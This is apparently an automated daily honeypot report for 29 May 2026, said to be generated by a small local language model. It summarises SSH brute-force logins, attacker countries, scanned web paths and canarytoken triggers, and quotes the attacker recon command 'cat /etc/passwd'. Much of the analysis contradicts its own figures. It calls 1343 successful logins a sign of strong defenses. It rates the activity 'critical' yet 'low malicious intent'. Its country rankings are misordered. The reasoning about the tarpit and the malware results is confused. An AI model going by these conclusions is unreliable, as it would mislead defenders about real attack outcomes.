Friday, 29 May 2026 💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — May 29, 2026

Critical threat level — massive coordinated attack activity across all honeypot services.

🌍 113 unique attackers ⚡ 21,116 events 📊 View raw data report →
ssh-brute-forcehoneypotweb-scanningmulti-protocolhigh-severitythreat-intelligence

Threat Landscape Overview

Today’s SSH honeypot activity saw a significant increase in connections and attempts. With 1343 successful login attempts and 1774 total logins, attackers are actively engaging with our security system. However, the most concerning aspect is that only 56 unique commands were executed on average, indicating low malicious intent. The high number of failed attempts and unfulfilled post-login commands suggests a robust defense mechanism in place.

Geographic Analysis

The honeypot was subjected to attacks originating from multiple countries but with some notable patterns emerging:

  • United States: 38 (21%) - This is the top source country, indicating continued interest in our system.
  • France: 20 (11%) - Another significant contributor, suggesting a growing presence of French-speaking attackers.
  • Belgium: 19 (10%) - The second-highest number, showing Belgium as a target nation.
  • China: 17 (9%) - China remains a persistent threat with its own unique set of attacks and login attempts.
  • Unknown: 15 (8%) - A mix of non-categorized IPs suggests ongoing security challenges without clear attribution.
  • Germany: 13 (7%) - Germany’s involvement is noteworthy, indicating targeted efforts from this region.
  • Vietnam: 7 (3%) - The smallest count but still significant with its own unique set of commands and failed attempts.
  • Russian Federation: 6 (3%) - Russia continues to be a persistent source with multiple login attempts.
  • Netherlands: 6 (3%) - Netherlands’ involvement is noteworthy, suggesting ongoing interest in our system.
  • United Kingdom: 4 (2%) - The smallest count but still significant.

These patterns highlight the diversity of threat actors and their targeted interests, providing valuable insight into our honeypot’s effectiveness in detecting and responding to real-world attacks.

SSH Brute Force Analysis

The majority of login attempts were unsuccessful due to common passwords like “admin”, “123456”, and others. This reflects a significant level of password reuse and brute force attacks, indicating that attackers are using widely known credentials for ease of access. The few successful logins show the resilience of our security measures in protecting against common vulnerabilities.

Post-Exploitation Behavior

The 33 TTY sessions revealed some interesting patterns:

  • Successful Logins: Despite numerous failed attempts, a small number of users managed to gain full access, indicating that even after being locked out, attackers can attempt multiple times.
  • Commands Executed:
    • whoami and cat /etc/passwd
    • These commands suggest attackers were exploring the system’s capabilities but did not escalate their privileges.

These findings highlight the importance of maintaining strong password policies and regular security audits to prevent unauthorized access despite brute force attempts.

Web Scanner Activity

The HTTP scanner identified a variety of paths, including “/SDK/webLanguage”, ”/”, “/favicon.ico”, “/zc?action=getInfo”, and “/.well-known/security.txt”. This suggests attackers are targeting specific vulnerabilities or looking for critical information on the system to exploit further. The high number of unique IPs indicates a wide-ranging interest in scanning our honeypot.

Malware Captures

Today, no malware was downloaded by any attacker through the SSH channel, indicating that even if they were trying to deploy malicious payloads, our security measures prevented it from being executed on our system.

SSH Tarpit (Endlessh)

There is no tarpit data in today’s logs, suggesting that attackers did not find a way to be trapped or delay their connections. This could indicate that the honeypot was effective in its deployment and monitoring capabilities without any significant disruptions caused by these potential tarpits.

Canarytoken Alerts

Sixty-seven canarytoken triggers were reported, indicating that attackers have been using fake AWS credentials planted within our honeypot to simulate successful logins. The variety of tokens suggests attackers are not only trying to bypass detection but also testing different tactics for future attacks. This underscores the importance of robust security practices and continuous threat intelligence monitoring.

Community Defense

The IPs reported to AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield highlight that our efforts in securing the honeypot are effective in alerting other defenders, which is crucial for collective protection. The inclusion of malware hashes on VirusTotal ensures that any malicious activity can be traced back to its origin, strengthening overall security measures.

Conclusion

The SSH honeypot continues to serve as a valuable tool in our cybersecurity arsenal. Despite the challenges posed by persistent attackers, our system has shown resilience and effectiveness in detecting and mitigating potential threats. The diverse attack patterns and successful responses highlight the need for continuous improvement in securing systems against both known and emerging threats. Stay tuned for more insights into our honeypot’s continued efforts to protect networks from real-world cyber threats.

This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.

🤖

This analysis was generated by qwen2.5:1.5b running locally on the same Raspberry Pi 5 that operates the honeypots. No data leaves the device. All threat data is sourced from real attacks captured in the last 24 hours.

← All analyses 📊 Data report →